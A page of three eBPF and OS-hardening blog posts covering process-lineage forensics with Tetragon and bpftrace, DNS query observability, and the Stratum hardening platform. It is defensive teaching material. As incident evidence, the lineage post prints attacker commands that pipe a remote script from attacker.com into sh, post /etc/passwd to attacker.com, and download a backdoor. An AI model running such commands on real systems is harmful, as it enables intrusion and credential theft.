The kernel’s task_struct contains the complete process identity: PID, PPID, UID, GID, process name, capabilities, and cgroup (which maps directly to a pod)
Tetragon and Falco both build process lineage from kernel events; the difference is storage — Tetragon persists a kernel-side cache of the process tree in BPF maps, Falco reconstructs lineage from an audit log stream
Reconstructing an incident from process lineage requires: who spawned the attacker’s process, what did it execute, what files did it open, what connections did it make — all correlated by PID and timestamp
Production caution: process events on a busy node can generate high ringbuf write volume; filter aggressively by namespace/cgroup at the eBPF level, not in userspace

EP12 showed how LSM hooks enforce at the syscall boundary — preventing operations before they complete. Process lineage with eBPF is the complementary capability: when an attacker bypasses enforcement, or when you need to understand what happened before the policy was in place, the kernel-level process record is how you reconstruct the attack chain. This episode covers how that record is built and how to read it.

Quick Check: What Process Events Is Your Cluster Already Recording?

# On any cluster node — verify exec tracing is available
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%-20s %-6d %s\n", comm, pid, str(args->filename));
}' --timeout 10

# Expected output:
# containerd-shim     1203   /usr/bin/runc
# runc                1204   /usr/sbin/runc
# sh                  1205   /bin/sh
# node                1842   /usr/local/bin/node
# kube-proxy          2091   /usr/local/bin/kube-proxy

# If Tetragon is installed — view the live process lineage stream
kubectl exec -n kube-system \
  $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_EXEC | head -20

Sample Tetragon output:

{
  "process_exec": {
    "process": {
      "pid": 18293,
      "binary": "/bin/sh",
      "arguments": "-c health-check.sh",
      "start_time": "2026-04-22T09:14:03.412Z",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"},
      "parent_pid": 18201
    },
    "parent": {
      "pid": 18201,
      "binary": "/usr/local/bin/my-app",
      "pod": {"name": "my-app-6d4f9-xk2p1", "namespace": "production"}
    }
  }
}

Each event has the process, its parent, the pod, the namespace, and the full binary path. That’s the raw material for process lineage reconstruction.

Not running Tetragon? Plain bpftrace on the node gives you the same raw data without Kubernetes enrichment — you get PIDs and process names but not pod names or namespaces without the /proc//cgroup mapping step. For incident reconstruction, the Tetragon-enriched stream is significantly more useful because pod attribution is baked in at capture time, not reconstructed afterward.

A container in the payments namespace was reported compromised. The security team’s automated response had already restarted the pod — the attacker’s process was gone. The container’s filesystem had been reset to the image. The application logs for that pod were deleted when the pod restarted. The Kubernetes event log showed the pod restart but nothing about what had run inside it.

Three questions, no answers yet:
1. What spawned the attacker’s process? (was it a remote code execution in the app, or a misconfigured exec?)
2. What did the attacker run after getting in? (what did they download, execute, touch?)
3. What network connections did they make? (where did data go, if anywhere?)

The answers were in Tetragon’s process event export — captured at the kernel level before the pod was restarted, stored in the observability backend, and queryable by pod name and time window. The kernel had seen every exec, every fork, every file open. The restart didn’t touch that record.

The lineage showed:

my-app (PID 18201)
  └── sh -c "curl http://attacker.com/payload.sh | sh"  (PID 18293)
        └── sh payload.sh  (PID 18294)
              ├── cat /etc/passwd  (PID 18295)
              ├── curl http://attacker.com/exfil -d @/etc/passwd  (PID 18296)
              └── wget -O /tmp/.x http://attacker.com/backdoor  (PID 18297)
                    └── chmod +x /tmp/.x  (PID 18298)

Five minutes of attacker activity, fully reconstructed, from a pod that no longer existed.

How the Kernel Tracks Process Identity

Every process in Linux is represented by a task_struct — the kernel’s internal data structure for a running process. It contains everything the kernel knows about that process.

task_struct — the kernel’s primary data structure for a process. Contains: PID, PPID, UID, GID, process name (comm, 15 chars), open file descriptors, memory mappings, namespace references, cgroup membership, capabilities, and a pointer to the parent task_struct. When bpftrace uses curtask, it’s returning a pointer to the current process’s task_struct. Reading curtask->real_parent->tgid gives you the parent’s PID — the foundation of process lineage.

When a process calls fork(), the kernel:
1. Allocates a new task_struct for the child
2. Copies the parent’s task_struct fields into the child
3. Sets the child’s real_parent pointer to the parent’s task_struct
4. Assigns the child a new PID
5. Returns the child’s PID to the parent, and 0 to the child

When the child calls execve(), the kernel:
1. Validates the binary (verifier/capability checks, LSM hooks)
2. Replaces the process’s memory image with the new binary
3. Updates task_struct->comm with the new process name
4. The PID does not change — execve replaces the process image but not the process identity

This fork → exec sequence is how every shell command works: the shell forks a child, the child execs the command. eBPF hooks on both events, correlated by PID and parent PID, give you the complete tree.

Building the Process Tree with kprobes

The two core hooks for process lineage:

# Every fork — capture parent/child relationship
bpftrace -e '
tracepoint:syscalls:sys_exit_clone {
    if (retval > 0) {
        # retval is the child PID (from parent's perspective)
        printf("FORK parent=%-6d child=%-6d parent_comm=%-20s\n",
               pid, retval, comm);
    }
}'

# Every exec — capture what binary replaced the process image
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("EXEC pid=%-6d ppid=%-6d binary=%-40s args=%s\n",
           pid,
           curtask->real_parent->tgid,
           str(args->filename),
           str(*args->argv));
}'

Combined output (30 seconds, simplified):

FORK parent=18201 child=18293  parent_comm=my-app
EXEC pid=18293 ppid=18201 binary=/bin/sh              args=sh -c curl http://...
FORK parent=18293 child=18294  parent_comm=sh
EXEC pid=18294 ppid=18293 binary=/bin/sh              args=sh payload.sh
FORK parent=18294 child=18295  parent_comm=sh
EXEC pid=18295 ppid=18294 binary=/bin/cat             args=cat /etc/passwd
FORK parent=18294 child=18296  parent_comm=sh
EXEC pid=18296 ppid=18294 binary=/usr/bin/curl        args=curl http://attacker.com/exfil -d @/etc/passwd

Each line is a kernel event. The parent/child PID chain is the tree. Rendered:

my-app (18201)
  └── sh (18293) — "sh -c curl http://attacker.com/payload.sh | sh"
        └── sh (18294) — "sh payload.sh"
              ├── cat (18295) — "/etc/passwd"
              └── curl (18296) — "http://attacker.com/exfil -d @/etc/passwd"

This tree is constructed entirely from kernel events. No application logging. No container stdout. No agent inside the container.

How Tetragon Stores the Process Tree in BPF Maps

bpftrace’s approach above produces an event stream — a log you reconstruct manually. Tetragon takes a different approach: it maintains a live process tree in BPF maps, updated on every fork and exec event, persistently queryable.

Kernel events (kprobe on clone, execve, exit)
      ↓
Tetragon eBPF programs
      ↓
Write to BPF_MAP_TYPE_HASH: process_cache
      key: PID
      value: {binary, args, start_time, parent_pid, pod_name, namespace, uid, gid, caps}
      ↓
Tetragon userspace agent
      reads process_cache on events
      enriches with Kubernetes pod metadata (from informer cache)
      exports to gRPC stream → observability backend

task_struct in BPF maps — Tetragon doesn’t store the raw task_struct pointer in its maps (pointers are not stable across process lifetime). Instead, it stores a snapshot of the relevant fields (PID, binary path, arguments, capabilities, cgroup path, start time) at the moment of the exec event, keyed by PID. When the process exits, the entry is kept in the cache for a configurable window to allow late-arriving events (like file closes or connection terminations) to be correlated back to the originating process.

To inspect Tetragon’s process cache directly:

# Find the Tetragon process cache map
bpftool map list | grep process_cache

# 112: hash  name process_cache  flags 0x0
#      key 4B  value 256B  max_entries 65536  memlock 16777216B

# Dump a few entries
bpftool map dump id 112 | head -60

# [{
#     "key": 18293,                           # ← PID
#     "value": {
#         "binary": "/bin/sh",
#         "args": "sh -c curl http://...",
#         "pid": 18293,
#         "ppid": 18201,
#         "uid": 1000,
#         "start_time": 1745296443,
#         "cgroup": "kubepods/burstable/pod3f8a21bc/.../payments"
#     }
# }]

The cgroup field maps directly to the pod — same path as /proc//cgroup but captured at exec time and stored in kernel space.

Correlating Files and Connections to the Process Tree

Process lineage is most useful when combined with the file access and network connection events from the same process. Tetragon’s TracingPolicy supports this multi-event correlation natively:

apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: observe-process-lineage
spec:
  kprobes:
    - call: "security_inode_permission"
      syscall: false
      args:
        - index: 0
          type: "inode"
      selectors:
        - matchNamespaces:
            - namespace: Net
              operator: "NotIn"
              values: ["1"]    # exclude host network namespace
          matchActions:
            - action: Post   # audit: log but don't block
    - call: "tcp_connect"
      syscall: false
      args:
        - index: 0
          type: "sock"
      selectors:
        - matchActions:
            - action: Post

With this policy active, Tetragon emits events for both file access and TCP connections, each carrying the full process context (PID, binary, pod, parent). Correlated by PID and timestamp:

tetra getevents | jq 'select(.process_kprobe.function_name == "tcp_connect") |
  {pid: .process_kprobe.process.pid,
   binary: .process_kprobe.process.binary,
   pod: .process_kprobe.process.pod.name,
   dst: .process_kprobe.args[0].sock_arg.daddr}'

Sample output:

{"pid": 18296, "binary": "/usr/bin/curl", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}
{"pid": 18297, "binary": "/usr/bin/wget", "pod": "my-app-6d4f9-xk2p1", "dst": "93.184.216.34"}

PID 18296 and 18297 both connected to the same IP. Cross-reference with the process tree: those are the curl and wget spawned by the attacker’s payload script. The destination IP is the attacker’s infrastructure. The timeline is milliseconds-precise because the events are timestamped by the kernel at the hook point.

Building Process Lineage Without Tetragon

If you’re not running Tetragon, you can build a basic process lineage recorder with bpftrace that writes to a file:

# Record all exec events to a file — run in the background on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
    printf("%llu EXEC pid=%-6d ppid=%-6d binary=%s\n",
           nsecs, pid, curtask->real_parent->tgid, str(args->filename));
}
tracepoint:sched:sched_process_exit {
    printf("%llu EXIT pid=%-6d comm=%s\n", nsecs, pid, comm);
}
' > /var/log/process-lineage.log &

# Tail the log for real-time observation
tail -f /var/log/process-lineage.log

Sample output:

1745296443123456789 EXEC pid=18293 ppid=18201 binary=/bin/sh
1745296443234567890 EXEC pid=18294 ppid=18293 binary=/bin/sh
1745296443345678901 EXEC pid=18295 ppid=18294 binary=/bin/cat
1745296443456789012 EXIT pid=18295 comm=cat
1745296443567890123 EXEC pid=18296 ppid=18294 binary=/usr/bin/curl
1745296443678901234 EXIT pid=18293 comm=sh

This file survives pod restarts because it’s on the node, not in the container. After the pod is restarted, the process lineage record is still on disk. You reconstruct the tree by grouping by ppid and ordering by timestamp.

Production Gotchas

Ringbuf saturation on high-process-churn nodes. Nodes running serverless workloads or short-lived batch jobs may spawn thousands of processes per minute. Hooking exec on every process at that rate generates a high ringbuf write volume. Filter at the eBPF level by cgroup (namespace) rather than in userspace — sending events to userspace only to discard them wastes ringbuf space and CPU. Tetragon’s namespace selector does this filtering in the eBPF program before the write.

The 15-character comm truncation. The comm field in task_struct is limited to 15 characters (plus null terminator). Process names longer than 15 characters are truncated. bpftrace‘s comm built-in has the same limit. For the full binary path, read from execve‘s filename argument at the tracepoint, not from comm.

PID reuse. Linux PIDs are reused after a process exits. In a high-churn environment, a PID you recorded as an attacker process may be reassigned to a legitimate process seconds later. Always pair PIDs with start time and cgroup path when correlating across events. Tetragon’s process cache keys on PID + start time to handle this.

Exec chains lose argument history. When execve replaces the process image, task_struct->comm changes but the PID does not. If the attacker’s shell runs exec bash to replace itself with a less suspicious binary name, the exec event captures the new binary — but the PID lineage still shows the parent correctly. Don’t rely on comm alone for process identity; always track the binary path from the exec event.

Process events don’t capture file content. You see that /bin/cat /etc/passwd ran. You don’t see what was in /etc/passwd at that moment unless you also capture file open/read events. Tetragon’s security_inode_permission hook tells you which files were accessed; capturing their content requires additional hooks on vfs_read with buffer capture, which is significantly higher overhead and requires careful data handling for sensitive files.

Quick Reference

What you want	Command
Live exec trace (bpftrace)	`bpftrace -e 'tracepoint:syscalls:sys_enter_execve { printf(...) }'`
Fork + exec tree	Combine `sys_exit_clone` + `sys_enter_execve` traces, correlate by pid/ppid
Tetragon process events	`tetra getevents --event-types PROCESS_EXEC`
Tetragon file + network	`tetra getevents --event-types PROCESS_KPROBE`
Process cache map	`bpftool map list \| grep process_cache` → `bpftool map dump id N`
Map PID to pod	`cat /proc//cgroup` → extract pod UID
Process exit events	`tracepoint:sched:sched_process_exit`

Process event	Kernel hook
New process spawned	`tracepoint:syscalls:sys_exit_clone` (retval > 0 = child PID)
Binary executed	`tracepoint:syscalls:sys_enter_execve`
Process exited	`tracepoint:sched:sched_process_exit`
File opened	`tracepoint:syscalls:sys_enter_openat`
Network connect	`kprobe:tcp_connect`
DNS query	`tracepoint:syscalls:sys_enter_sendto` (port 53)

Key Takeaways

Process lineage with eBPF hooks fork and exec at the kernel level — every process spawned on a node is recorded with its parent PID, binary path, arguments, and container context, regardless of what the container does to suppress application logs
The kernel’s task_struct is the authoritative source of process identity; eBPF programs read it at hook time and snapshot the relevant fields into BPF maps before the process can exit or be killed
Tetragon maintains a live process tree in BPF maps, correlates it with Kubernetes metadata, and makes it queryable by pod/namespace — the record persists after the pod is restarted
Incident reconstruction requires correlating process lineage with file access events and network connection events, all correlated by PID and timestamp — eBPF provides all three event streams from the same kernel attachment mechanism
PID reuse is a real concern in high-churn environments; always pair PIDs with start time and cgroup path when correlating across events
Kernel-level process events cannot be suppressed by a compromised container process — an attacker with root inside the container still cannot prevent bpftrace or Tetragon running on the host from recording their syscalls

What’s Next

EP14 is the payoff episode for the entire series arc so far. You’ve seen programs load (EP04), maps hold state (EP05), CO-RE keep programs portable (EP06), XDP and TC enforce at the network layer (EP07, EP08), bpftrace ask one-off questions (EP09), and the observability stack collect flow, DNS, and process data continuously (EP10, EP11, EP12, EP13).

EP14 synthesises all of it into four commands that tell you everything about any cluster you’ve never seen before — any eBPF-based tool, any vendor, any configuration. The audit playbook is what you run in the first 10 minutes when you inherit a cluster and need to understand what’s enforcing policy at the kernel level before you can trust anything it tells you.

Next: the audit playbook — four commands to see any cluster

Get EP14 in your inbox when it publishes → linuxcent.com/subscribe

The post Process Lineage — Reconstructing What Happened After the Fact appeared first on Linuxcent.

DNS at the Kernel Level — What Your Pods Are Actually Resolving

Vamshi Krishna Santhapuri — Sat, 06 Jun 2026 02:00:00 +0000

Reading Time: 9 minutes

eBPF: From Kernel to Cloud, Episode 11
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace · Network Flow Observability · DNS Observability

TL;DR

DNS observability in Kubernetes with eBPF hooks the kernel’s DNS syscall path — giving you per-pod query visibility without sidecars, restarts, or CoreDNS log scraping
(tracepoint = a stable, versioned hook placed deliberately in the Linux kernel source; unlike kprobes, tracepoints survive kernel upgrades without breakage)
CoreDNS metrics tell you aggregate query rates; eBPF tracepoints tell you which pod queried what domain, when, and what was returned
A compromised workload’s first observable action is almost always an unexpected DNS query — infrastructure no legitimate process should ever resolve
The DNS syscall path in Linux goes: application calls getaddrinfo() → glibc → sendto() syscall → kernel network stack → UDP packet to CoreDNS resolver
You hook the sendto tracepoint to catch the query leaving the pod and the recvfrom tracepoint to catch the response arriving
Production note: DNS query payloads cross the kernel as raw UDP — parsing the DNS wire format in a bpftrace one-liner requires reading past the UDP header; Tetragon and Pixie do this parsing in the eBPF program itself

EP10 showed eBPF flow telemetry as the ground truth for what connections your pods are making. DNS observability with eBPF goes one layer beneath that: the name resolution step that happens before any connection is established. Every domain a pod resolves is visible at the kernel level. That visibility is what a security scan alert is missing when it flags “unexpected DNS queries” — it can see the traffic on the wire, but it can’t tell you which pod sent it without restarting or deploying an agent into the pod.

Quick Check: What DNS Traffic Is Leaving Your Pods Right Now?

Without installing anything, you can see DNS queries crossing any node in under 30 seconds:

# SSH into a worker node, then:

# Watch all UDP port 53 traffic — which processes are making DNS queries?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) {
        printf("%-20s %-6d DNS query (UDP sendto)\n", comm, pid);
    }
}' --timeout 30

Expected output:

coredns              1842   DNS query (UDP sendto)   # ← CoreDNS forwarding upstream
nginx                9231   DNS query (UDP sendto)   # ← nginx resolving upstream
payment-svc          11043  DNS query (UDP sendto)   # ← your service making queries
curl                 14829  DNS query (UDP sendto)   # ← kubectl exec / debug session

# How many DNS queries per process in the last 30 seconds?
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) { @dns_queries[comm] = count(); }
}
interval:s:30 { print(@dns_queries); exit(); }
'

Expected output:

@dns_queries[coredns]:       1203   # ← upstream forwarder traffic
@dns_queries[payment-svc]:    847   # ← legitimate service queries
@dns_queries[unknown]:         12   # ← investigate this one

On EKS or GKE managed nodes: You may not be able to SSH directly to worker nodes, but you can run a privileged debug pod: kubectl debug node/ -it --image=quay.io/iovisor/bpftrace. The bpftrace program runs on the host kernel and sees all pods’ DNS queries. GKE Autopilot restricts privileged pods — use GKE’s built-in eBPF-based DNS observability instead (enabled via Cloud Logging with DNS policy logging).

A security scan flagged unexpected DNS queries from payment-svc in the production namespace. The query domains didn’t match anything in the service’s known dependency list. The scan tool showed the traffic on the wire — destination port 53, from the pod’s IP — but couldn’t tell us which process inside the pod was responsible or what domain was being queried without pulling the pod’s DNS logs.

The pod had no DNS logging enabled. CoreDNS showed the queries in its aggregate metrics but with no attribution below namespace level. Restarting the pod to add a DNS sidecar would wipe any in-memory state the process had accumulated.

I ran bpftrace with a recvfrom hook to catch the DNS response payloads coming back into the pod:

bpftrace -e '
tracepoint:syscalls:sys_exit_recvfrom {
    if (retval > 0) {
        printf("%-20s PID %-6d received %d bytes (possible DNS response)\n",
               comm, pid, retval);
    }
}' --timeout 60

Then cross-referenced the PIDs to container processes via /proc//cgroup. The unexpected queries were coming from a sidecar process that had been injected by a recent Helm chart change — not from the main application container at all. A misconfigured Datadog agent injected into the wrong namespace was querying its intake endpoint.

No restart. No sidecar deployment. Found in under two minutes.

Why CoreDNS Metrics Don’t Give You This

CoreDNS exposes DNS query metrics via Prometheus. Those metrics tell you:
– Total queries per second across the cluster
– Query latency histograms
– Error rates (NXDOMAIN, SERVFAIL)
– Upstream forwarder health

What they don’t tell you:
– Which specific pod sent a query to a specific domain
– Which process inside that pod made the getaddrinfo() call
– Whether the query came from the main container or an injected sidecar
– The timing relationship between a DNS query and the connection that followed it

CoreDNS sees the query after it arrives at the resolver. eBPF tracepoints see the query at the moment the pod’s process issues the sendto() syscall — before it leaves the node. The difference is attribution.

The DNS Syscall Path in Linux

Understanding where the hook fires helps you reason about what you can observe:

Application code
    ↓
getaddrinfo("api.example.com") ← glibc resolver function
    ↓
glibc reads /etc/resolv.conf → finds nameserver 10.96.0.10 (CoreDNS ClusterIP)
    ↓
glibc builds DNS wire-format query packet
    ↓
sendto(sockfd, buf, len, 0, &resolver_addr, addrlen)
    ↓                     ← eBPF tracepoint fires here: sys_enter_sendto
Linux kernel: udp_sendmsg()
    ↓
Packet leaves pod veth interface
    ↓
TC eBPF on veth sees UDP packet (flow telemetry picks this up too)
    ↓
CoreDNS receives query, resolves, sends response
    ↓
Packet arrives back at pod veth
    ↓
recvfrom(sockfd, buf, len, 0, &src_addr, &src_len)
    ↓                     ← eBPF tracepoint fires here: sys_exit_recvfrom
glibc parses DNS response
    ↓
getaddrinfo() returns IP addresses to application

getaddrinfo — the standard POSIX function applications call to resolve a hostname to IP addresses. It lives in glibc, not in the kernel. The kernel never sees the domain name string directly — it only sees the UDP packet carrying the DNS wire-format query. To read the actual domain name in an eBPF program, you parse the DNS packet payload at the sendto tracepoint.

tracepoint — a stable, versioned hook deliberately placed in Linux kernel source code by kernel developers. Unlike kprobes (which attach to arbitrary kernel functions and break when those functions change), tracepoints are part of the kernel’s stable interface. The syscalls:sys_enter_sendto tracepoint has been present and stable since kernel 3.x. You can rely on it across Ubuntu 20.04 through the latest kernels without version checks.

Reading DNS Queries at the Tracepoint

The sendto tracepoint fires when any process sends data on a socket. Filtering to port 53 gives you DNS queries. Parsing the payload gives you the domain name.

The DNS wire format for a query:

Bytes 0-11:   DNS header (12 bytes)
              - Transaction ID (2 bytes)
              - Flags (2 bytes)
              - QDCount, ANCount, NSCount, ARCount (2 bytes each)
Byte 12+:     Question section
              - QNAME (variable length, label-encoded)
              - QTYPE (2 bytes)
              - QCLASS (2 bytes)

The QNAME is length-prefixed labels: \x03api\x07example\x03com\x00 for api.example.com. bpftrace can read the raw bytes but parsing label encoding inline in a one-liner is awkward. For raw query detection (flag any DNS query from a specific process), the tracepoint is enough:

# Watch DNS queries from a specific process name — replace "payment-svc"
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto /comm == "payment-svc"/ {
    printf("PID %-6d sending %d bytes to DNS\n", pid, args->len);
}
'

For full domain name extraction, use a tool that implements DNS wire-format parsing in its eBPF layer. Tetragon and Pixie both do this. On a Tetragon-instrumented cluster:

# Watch DNS queries with domain names — Tetragon (all pods)
kubectl exec -n kube-system -it $(kubectl get pod -n kube-system -l app.kubernetes.io/name=tetragon -o name | head -1) \
  -- tetra getevents --event-types PROCESS_KPROBE \
  | grep -i dns

Sample Tetragon output:

{
  "process": {
    "pod": {"name": "payment-svc-7d4b9f-xk2p1", "namespace": "production"},
    "binary": "/usr/bin/payment-service",
    "pid": 11043
  },
  "function_name": "__sys_sendto",
  "args": [
    {"sock_arg": {"family": "AF_INET", "protocol": "UDP",
                  "daddr": "10.96.0.10", "dport": 53}},
    {"bytes_arg": ""}
  ]
}

Pod name, namespace, binary, PID, and the domain being queried — all from a kernel tracepoint, no sidecar, no pod restart.

Building Pod-Level DNS Attribution Without Tetragon

If you’re not running Tetragon, you can build pod-level attribution from the PID. When bpftrace reports a PID making a DNS query, map it to a container:

# Get the PID from bpftrace, then:
PID=11043

# Which cgroup does this PID belong to? (maps to container/pod)
cat /proc/$PID/cgroup | grep kubepods
# 12:cpu:/kubepods/burstable/pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12/a4c8f1e2b3d4...
# The pod UID is embedded: pod3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12

# Map pod UID to pod name
kubectl get pods -A -o jsonpath='{range .items[*]}{.metadata.uid}{" "}{.metadata.name}{" "}{.metadata.namespace}{"\n"}{end}' \
  | grep 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12
# 3f8a21bc-4e7d-4b91-a3c2-8b947f6e3d12  payment-svc-7d4b9f-xk2p1  production

That’s the full chain: kernel tracepoint → host PID → cgroup path → pod UID → pod name + namespace. Automatable. No agents required inside the pod.

Detecting Anomalous DNS: What to Watch For

DNS is the first observable action in most attack chains. A process that has been compromised or injected typically cannot establish a C2 connection without first resolving the C2 domain.

Signals worth watching at the kernel DNS layer:

Queries to non-cluster domains from unexpected processes

# Flag any DNS query to a non-cluster domain (not .cluster.local or .svc.cluster.local)
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) {
        printf("%-20s %-6d DNS sendto\n", comm, pid);
    }
}' --timeout 60

High-frequency DNS queries from a single process (DNS tunneling fingerprint)

# Processes making more than N DNS queries per second
bpftrace -e '
tracepoint:syscalls:sys_enter_sendto {
    $port = (uint16)((uint8*)args->addr)[3] << 8 |
            (uint16)((uint8*)args->addr)[2];
    if ($port == 53) { @[pid, comm] = count(); }
}
interval:s:1 {
    print(@);
    clear(@);
}
'

DNS tunneling exfiltrates data by encoding it in subdomains of queries. A process making 50+ DNS queries per second to varied subdomains of the same parent domain is a strong signal. CoreDNS aggregate metrics will show elevated query volume; the kernel tracepoint tells you which PID is responsible.

Queries immediately followed by a connection (normal vs anomalous pattern)

Legitimate services resolve a known set of domains. A process that resolves a new, never-before-seen domain and immediately opens a TCP connection to the returned IP is structurally different from normal service behavior. The combination of DNS tracepoint + TCP connect kprobe lets you correlate these events by PID and timestamp — without any application instrumentation.

Production Gotchas

DNS payload parsing is not trivial in bpftrace. Reading the domain name from the UDP payload requires byte-level parsing of the DNS wire format inside an eBPF program. bpftrace can read raw bytes with buf(), but the label-encoded domain name format requires a loop that the verifier may reject for complexity reasons. Tools like Tetragon and Pixie implement this parsing in C within their eBPF programs where they have more control over verifier limits. For raw detection (flag DNS queries from unexpected processes), the sendto tracepoint without payload parsing is enough.

sendto fires for all UDP, not just DNS. Filter on the destination port. The destination address structure is at args->addr — port is in network byte order at bytes 2–3 of the sockaddr_in structure. The filtering in the examples above is correct for port 53; double-check if you’re on a cluster that uses a non-standard DNS port.

CoreDNS pods will appear in your DNS query trace — that’s expected. CoreDNS makes upstream DNS queries to resolve non-cluster domains. Filter on namespace/cgroup if you want to exclude CoreDNS from your trace.

DNS over TCP is a separate code path. Most DNS queries are UDP. Large responses (>512 bytes) or DNSSEC responses may trigger TCP fallback. The sendto tracepoint catches UDP; for TCP DNS, you’d need tcp_sendmsg with port 53 filtering. In practice, within-cluster DNS resolution is almost entirely UDP.

glibc caching means not every getaddrinfo() generates a DNS query. glibc caches resolved hostnames in the process’s memory. A service that calls getaddrinfo("api.example.com") every 100ms may only generate a DNS query every 30 seconds (the TTL). If you’re looking for which pods are resolving a domain and see only occasional tracepoint hits, that’s expected — it’s the cache miss rate, not the access rate.

Quick Reference

What you want	Command
All DNS queries on a node	`bpftrace -e 'tracepoint:syscalls:sys_enter_sendto { if (port == 53) ... }'`
DNS query count per process	`bpftrace -e '... { @[comm] = count(); }'`
DNS queries from a specific process	`bpftrace -e '... /comm == "my-svc"/ { ... }'`
Map PID to pod	`cat /proc//cgroup` → extract pod UID → `kubectl get pods`
DNS events with domain names (Tetragon)	`tetra getevents --event-types PROCESS_KPROBE`
DNS policy violations (Cilium)	`hubble observe --verdict DROPPED --protocol DNS`
CoreDNS query logs	`kubectl logs -n kube-system -l k8s-app=kube-dns`

DNS signal	What it indicates
New domain, immediate TCP connect	Possible C2 resolution
50+ queries/second from one PID	DNS tunneling candidate
Query to non-cluster domain from batch job	Unusual — investigate
NXDOMAIN responses at high rate	Misconfiguration or DGA
Queries from PID not matching any known binary	Injected process

Key Takeaways

DNS observability in Kubernetes with eBPF uses the sendto tracepoint — the hook fires when the process issues the syscall, before the packet leaves the node, giving you PID-level attribution with no sidecar
CoreDNS metrics show aggregate DNS health; kernel tracepoints show which pod and which process made each query — the attribution gap between the two is where anomaly detection lives
The DNS syscall path goes: getaddrinfo() → glibc → sendto() syscall → kernel UDP stack → CoreDNS. eBPF hooks fire at the sendto() boundary
A compromised workload’s first observable action is almost always a DNS query; tracepoint-based DNS observability catches it at the kernel level, ahead of any application log
glibc caches resolved names, so tracepoint hit rate reflects cache misses, not getaddrinfo() call rate — account for this when baselining
Full domain name extraction requires DNS wire-format parsing; Tetragon and Pixie do this in their eBPF programs; bpftrace one-liners detect the query event without the domain string

What’s Next

DNS observability tells you what a workload is resolving. EP12 answers what happens when you want to stop a workload from doing something — not detect it after the fact, but prevent it at the syscall boundary before it completes.

LSM hooks and Tetragon’s kill path enforce at the kernel level. When the kernel enforces, the process never gets the return value from the syscall. There is no “detect and respond” window — the action simply does not complete. That is a structurally different security posture from anything a sidecar or userspace agent can provide.

Next: LSM and Tetragon — when the kernel says no

Get EP12 in your inbox when it publishes → linuxcent.com/subscribe

The post DNS at the Kernel Level — What Your Pods Are Actually Resolving appeared first on Linuxcent.

Stratum — OS Hardening as a Platform

Vamshi Krishna Santhapuri — Sun, 31 May 2026 02:00:00 +0000

Reading Time: 5 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · Stratum Platform**

TL;DR

Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub
The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable
Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations
Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
Installation is a single helm install or docker compose up — the platform runs in your environment

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.

I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn’t the tooling — it’s the integration layer that ties them together into a reproducible, auditable pipeline.

Stratum is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.

The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
